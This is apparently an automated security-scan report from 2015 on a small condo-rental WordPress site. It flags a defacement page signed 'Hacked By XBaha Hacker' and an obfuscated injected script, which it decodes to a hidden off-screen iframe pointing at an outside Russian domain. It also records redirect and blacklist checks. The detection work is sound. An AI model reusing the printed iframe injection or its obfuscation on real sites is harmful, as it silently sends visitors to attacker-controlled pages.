Scanned pages/files
| Request | Server response | Status |
http://hermosawavescondos.com/ | 200 OK Content-Length: 9539 Content-Type: text/html | suspicious |
Deface/Content modification. The following signature was found: Hacked By XBaha Hacker <p>
<html> <title>Hacked By XBaha Hacker</title><embed src='https://www.youtube.com/v/0_-LGEa6iWw&autoplay=1' <head> </head> <script language=JavaScript> //Disable right click script var message = ""; /////////////////////////////////// function clickIE() { if (document.all) { (message); return false; } } function clickNS(e) { ...[10659 bytes skipped]... | ||
http://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js | 200 OK Content-Length: 93100 Content-Type: text/javascript | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js | 200 OK Content-Length: 91342 Content-Type: text/javascript | clean |
http://hermosawavescondos.com//go.pub2srv.com/apu.php?zoneid=16780/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sun, 12 Jul 2015 20:55:11 GMT Pragma: no-cache Location: http://hermosawavescondos.com/go.pub2srv.com/apu.php?zoneid=16780/ Server: nginx/1.8.0 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://hermosawavescondos.com/xmlrpc.php | clean |
http://hermosawavescondos.com/go.pub2srv.com/apu.php?zoneid=16780/ | 404 Not Found Content-Length: 21120 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var Rvnqx_lnh=[306,366,406,411,424,338,421,422,427,414,407,367,340,418,417,421,411,422,411,417,416,364,338,403,404,421,417,414,423,422,407,365,338,414,407,408,422,364,351,355,354,354,343,365,338,422,417,418,364,354,343,365,338,425,411,406,422,410,364,355,354,354,343,365,338,410,407,411,409,410,422,364,355,354,354,343,365,340,368,366,411,408,420,403,415,407,338,421,422,427,414,407,367,340,425,411,406,422,410,364,355,354,354,343,365,410,407,411,409,4 ...[684 bytes skipped]... Decoded script: <div style="position: absolute; left:-100%; top:0%; width:100%; height:100%;"><iframe style="width:100%;height:100%" width="100%" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src="http://mobi-avto.ru/r/alpha"></iframe></div> | ||
http://ajax.googleapis.com/ajax/libs/jquery/1.6/jquery.min.js?ver=3.8 | 200 OK Content-Length: 91668 Content-Type: text/javascript | clean |
http://hermosawavescondos.com/wp-includes/js/utils.min.js?ver=3.8 | 200 OK Content-Length: 1739 Content-Type: application/javascript | clean |
http://hermosawavescondos.com/wp-content/plugins/imagemapper/script/jquery.imagemapster.min.js?ver=3.8 | 200 OK Content-Length: 40090 Content-Type: application/javascript | clean |
http://hermosawavescondos.com/wp-content/plugins/imagemapper/imagemapper_script.js?ver=3.8 | 200 OK Content-Length: 7398 Content-Type: application/javascript | clean |
http://www.google.com/jsapi?ver=3.8 | 200 OK Content-Length: 24558 Content-Type: text/javascript | clean |
http://hermosawavescondos.com/wp-content/plugins/ajaxify-wordpress-site/js/history.js?ver=3.8 | 200 OK Content-Length: 21571 Content-Type: application/javascript | clean |
http://hermosawavescondos.com/wp-content/plugins/ajaxify-wordpress-site/js/ajaxify.js?ver=3.8 | 200 OK Content-Length: 6623 Content-Type: application/javascript | clean |
http://hermosawavescondos.com/wp-content/plugins/google-map-shortcode/js/gmshc.2.3.min.js?ver=3.8 | 200 OK Content-Length: 6347 Content-Type: application/javascript | clean |
http://maps.google.com/maps/api/js?sensor=false&language=en&ver=3.8 | 200 OK Content-Length: 4299 Content-Type: text/javascript | clean |
http://hermosawavescondos.com/wp-content/plugins/theme-blvd-responsive-google-maps/assets/jquery.gmap.min.js?ver=3.0 | 200 OK Content-Length: 3829 Content-Type: application/javascript | clean |
http://maps.google.com/maps/api/js?sensor=false&ver=4.2 | 200 OK Content-Length: 4410 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hermosawavescondos.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 12 Jul 2015 20:55:09 GMT
Accept-Ranges: bytes
Server: nginx/1.8.0
Content-Length: 9539
Content-Type: text/html
Last-Modified: Sun, 28 Jun 2015 19:14:57 GMT
...9539 bytes of data.
GET / HTTP/1.1
Host: hermosawavescondos.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 12 Jul 2015 20:55:09 GMT
Accept-Ranges: bytes
Server: nginx/1.8.0
Content-Length: 9539
Content-Type: text/html
Last-Modified: Sun, 28 Jun 2015 19:14:57 GMT
...9539 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: hermosawavescondos.com
Referer: http://www.google.com/search?q=hermosawavescondos.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hermosawavescondos.com
Referer: http://www.google.com/search?q=hermosawavescondos.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hermosawavescondos.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://hermosawavescondos.com/
Result: hermosawavescondos.com is not infected or malware details are not published yet.
Result: hermosawavescondos.com is not infected or malware details are not published yet.